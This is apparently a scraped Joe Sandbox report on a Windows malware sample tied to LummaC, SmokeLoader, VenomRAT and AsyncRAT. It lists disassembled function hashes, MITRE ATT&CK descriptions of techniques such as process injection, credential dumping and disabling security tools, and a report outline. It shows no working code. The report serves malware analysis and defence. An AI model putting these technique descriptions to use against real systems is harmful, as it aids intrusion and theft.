Opcode ID: 31f7978babac8551c64e9bb849f746f9f3482af39f66a5e35b9578b2fc9368e5
Instruction ID: c48a06370bc0b7dd0d88802da3e4e807184336064f34b50a125de7ce3b80d45b
Opcode Fuzzy Hash: 31f7978babac8551c64e9bb849f746f9f3482af39f66a5e35b9578b2fc9368e5
Instruction Fuzzy Hash: F841927290C54A8FE794EE289C252B9BBE1EF55360FC4417AD849C32D2DF28782587E1

Function 00007FF7C08B3AC0 Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2679555626.00007FF7C08A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C08A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff7c08a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 814d3340142304e6a839d91af851343db3c1ad99c72aaeb352a50747e4f5de05
Instruction ID: fe537980807b2fe450833bfe2ef45a2e495f1eb87ac31f44caa734211cf4cb34
Opcode Fuzzy Hash: 814d3340142304e6a839d91af851343db3c1ad99c72aaeb352a50747e4f5de05
Instruction Fuzzy Hash: F141A130A0C90A5FEB94FA6C9845AB5B3D1EF54320B948179D89EC33A6DF29FC518790

Function 00007FF7C08B8C78 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2679555626.00007FF7C08A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C08A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff7c08a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f09065d71351fd6169dd3f0d9b3ff0046d5a4853ac365f14552db1af513a2fd
Instruction ID: 105fb44ae4478e2e7fbfd75b44c085e9c51637e70a62edef835f6696d1a1f921
Opcode Fuzzy Hash: 6f09065d71351fd6169dd3f0d9b3ff0046d5a4853ac365f14552db1af513a2fd
Instruction Fuzzy Hash: 3231503190895E8FEB94EE1898153BDB6E1EF98360F84457AE80DD33D1DF28A86587D0

Function 00007FF7C08B13E0 Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2679555626.00007FF7C08A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C08A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff7c08a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d2a1c8e9c3df3248b5d78b8a3b9610a4b7a7b4caa3ed0e4f9a8c3e82917cf68
Instruction ID: 2f09f49404284d61482a9d05e20fa1cc5f235bb29fa1fd9449d7fcd9f4c047cb
Opcode Fuzzy Hash: 7d2a1c8e9c3df3248b5d78b8a3b9610a4b7a7b4caa3ed0e4f9a8c3e82917cf68
Instruction Fuzzy Hash: 3D3191316089184FDF58EA18DC82BB9B3E1FB89324F5041B9D84ED7296DE20BC528BD1

Function 00007FF7C08B3A48 Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2679555626.00007FF7C08A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C08A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff7c08a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6656e2f7006d03bcd82bddc0389f632538c126e7727aea3c6f95e2691d6e5cd2
Instruction ID: d5a50b0a83fa8f6612af6e48f69bba81b17532eccea77516d457f93009827d8b
Opcode Fuzzy Hash: 6656e2f7006d03bcd82bddc0389f632538c126e7727aea3c6f95e2691d6e5cd2
Instruction Fuzzy Hash: 35316030A0C9494FDB98EB28C854B75B7D1EF99320F9481B9D48EC7392DE19BC92C791

Function 00007FF7C08B4080 Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2679555626.00007FF7C08A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C08A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff7c08a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9fbc0b9c2f85546082733b9c74fa6f673f382da9e2a93cb7f0ed79f7b025c57a
Instruction ID: 69f4341e98d213a794ac15312b499d06ca84da76a238852b20e3bff52f3a2186
Opcode Fuzzy Hash: 9fbc0b9c2f85546082733b9c74fa6f673f382da9e2a93cb7f0ed79f7b025c57a
Instruction Fuzzy Hash: D4318030318C1C4FDBA8FE1DE849E6577D1FB9832171151AAE45EC7366DE21EC928780

Function 00007FF7C08B1430 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2679555626.00007FF7C08A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C08A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff7c08a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6bba2ab3bb5837555771a8fef6fdb682bfd9f56e402d78712c9ba43fdd86973
Instruction ID: 1c0b3b16f6329820d122170700b78d58edaec8e030fc92de75ce470ec3a593ed
Opcode Fuzzy Hash: b6bba2ab3bb5837555771a8fef6fdb682bfd9f56e402d78712c9ba43fdd86973
Instruction Fuzzy Hash: E2314A306059098FD7A4EF6CD858A99B7E1FF4832175511AAE89AC7771DB20ECD1CBC0

Function 00007FF7C08B5E21 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2679555626.00007FF7C08A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C08A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff7c08a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa4c0664b7c3364104edb3f70192090df090f807b32b3cb7ee11bdfba73ca3f7
Instruction ID: 8e8d52a358a7156114c3bf543f381f2c6efd1e0c7ba8da9b5a0c90de453de424
Opcode Fuzzy Hash: fa4c0664b7c3364104edb3f70192090df090f807b32b3cb7ee11bdfba73ca3f7
Instruction Fuzzy Hash: 0421A230628E088FCB98EF2CC985A65B7E1FF5831534505ADD48AC7AA2CB24FC41CB40

Function 00007FF7C08B4958 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2679555626.00007FF7C08A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C08A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff7c08a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da9ca36f151b58da1681fb96db2dcc9808b424178b40a9d5f6f7d7ea6daffdf5
Instruction ID: 8d1a9e862233d1708f2b9b30c44f574f059b5aabebde748700c83e99c70b3f96
Opcode Fuzzy Hash: da9ca36f151b58da1681fb96db2dcc9808b424178b40a9d5f6f7d7ea6daffdf5
Instruction Fuzzy Hash: 5211C03070CC1C4FD7A8EB1DE858AA577D1EB98721B1141AAF45DC7366CE21EC9287C0

Function 00007FF7C08B9221 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2679555626.00007FF7C08A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C08A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff7c08a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 394d92217ffe29abde6c64f7dcc06c2e0d5b86fd91e5e57dccda6fa264bfbb3f
Instruction ID: 32658e8d08dfedc92888989cddb5c05fd5c1a4c539f0ec064d5837c89409e9bd
Opcode Fuzzy Hash: 394d92217ffe29abde6c64f7dcc06c2e0d5b86fd91e5e57dccda6fa264bfbb3f
Instruction Fuzzy Hash: 0511423160D8485FDB95EB2CDC989647FE1EF5A31234605E7D489CB272DA15EC81C750

Function 00007FF7C08B9382 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2679555626.00007FF7C08A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C08A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff7c08a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1dc0b67e1247fb507d465dd653c162e100744c1b44778b9d98fb538fd0ee62b7
Instruction ID: 7abc036f28f264329a04a1e401c36b7d98f443d95539f573dc996139a0e26483
Opcode Fuzzy Hash: 1dc0b67e1247fb507d465dd653c162e100744c1b44778b9d98fb538fd0ee62b7
Instruction Fuzzy Hash: 5F21723050CA894FDB55EB28C854F61BBE1EF9A310F4940E9D48DCB2A3DA25FC92CB50

Function 00007FF7C08B8E78 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2679555626.00007FF7C08A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C08A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff7c08a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 222b87a84ae4006f65f9d8b9832e0083fe192572dd7134040ad75c12512bfc05
Instruction ID: e197e827e3c8427c89a7130b5cf6beb8819794330edb313eb85b792b26f60e76
Opcode Fuzzy Hash: 222b87a84ae4006f65f9d8b9832e0083fe192572dd7134040ad75c12512bfc05
Instruction Fuzzy Hash: D011883160CA484FC721BB249C508E6BFE5EF86320B0441ABD41EC7392DA68B966C7E1

Function 00007FF7C08B4A9F Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2679555626.00007FF7C08A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C08A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff7c08a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 347162c43ec05f6591ca2cebf67c308aff8a9fc05d909e19d374e0aa6b9ebd72
Instruction ID: 996b6045f969c13f1d24367c603d092e9ef16e0ca041c3521d71301a17991919
Opcode Fuzzy Hash: 347162c43ec05f6591ca2cebf67c308aff8a9fc05d909e19d374e0aa6b9ebd72
Instruction Fuzzy Hash: 82110B3150DA850FD356BB7458166A5FFE0EF42170F4942FAC499CB293DF1CB84683A1

Function 00007FF7C08B4A35 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2679555626.00007FF7C08A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C08A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff7c08a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba214b4c4c7023011f7bf7546b99c51a6074b317134efc9521b13e9d866523e0
Instruction ID: 2392ad6648aa496bfb4b0eec14df56c6f52b9737585af36b1e577c4e43ca53b9
Opcode Fuzzy Hash: ba214b4c4c7023011f7bf7546b99c51a6074b317134efc9521b13e9d866523e0
Instruction Fuzzy Hash: CE01262175D78A0FD354AFBD6C96261BBD4EF5A21574960BAD888C3282EA50E81083D5

Function 00007FF7C08A3945 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2679555626.00007FF7C08A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C08A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff7c08a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction ID: 0eb73c8a9aefaf2beab6fde2fcf01d826cf746fa66318a46a0f0f8ba8d88afb4
Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction Fuzzy Hash: 0C01843010CB0C4FD744EF0CE051AA6B7E0FB85360F10052DE58AC3651D622E891CB45

Function 00007FF7C08B4058 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2679555626.00007FF7C08A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C08A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff7c08a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c755cf7e248f85c02c36c5c45a487ff13189a685a05aad69857f334ce0d4a9d2
Instruction ID: 629e6fd7ec49c4cd8ac834417ef87d3b9925d86402872fa97a8157df3d780428
Opcode Fuzzy Hash: c755cf7e248f85c02c36c5c45a487ff13189a685a05aad69857f334ce0d4a9d2
Instruction Fuzzy Hash: 78F05031B58A1F0B92A4ACAD6CCA63177C8EB581207446039E80DC3350FD50FC0143D4

Function 00007FF7C08B8E3B Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2679555626.00007FF7C08A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C08A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff7c08a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2187cb2d8137b69e2f6815fa34b256c9162a98d7a333ec75ec84b7e9dca547d
Instruction ID: df2dc9e8189dbc7703fb5b14df9edc95fbf41496747a1a0af25657c179f83237
Opcode Fuzzy Hash: d2187cb2d8137b69e2f6815fa34b256c9162a98d7a333ec75ec84b7e9dca547d
Instruction Fuzzy Hash: 1CF0F67661990D9BDB00AB69EC145D8FBE0FFC9329F08006AE41DC3291DB66A865C399

Non-executed Functions

Function 00007FF7C0971049 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2680989432.00007FF7C0970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff7c0970000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03fbec49de1575c9575300468d7871dcb2d2be7e299cc91bd1172f1c1bab547d
Instruction ID: e3a0560a38659f61c8a7c2fd75e4b17090b444f395b3aa356634cd0295f2525e
Opcode Fuzzy Hash: 03fbec49de1575c9575300468d7871dcb2d2be7e299cc91bd1172f1c1bab547d
Instruction Fuzzy Hash: A521515290E7C51FE3575B7858696A4BFB0AF57620B4E41EBC088CF1A3D60D28898362

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 7Y18r(14).exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Threatname: SmokeLoader

Threatname: VenomRAT

Threatname: AsyncRAT

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Snort Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe

Windows Analysis Report
7Y18r(14).exe

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.
Tactics:	Lateral Movement
Data Sources:	File: File Creation, File: File Modification, Network Share: Network Share Access, Process: Process Creation
Platforms:	Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
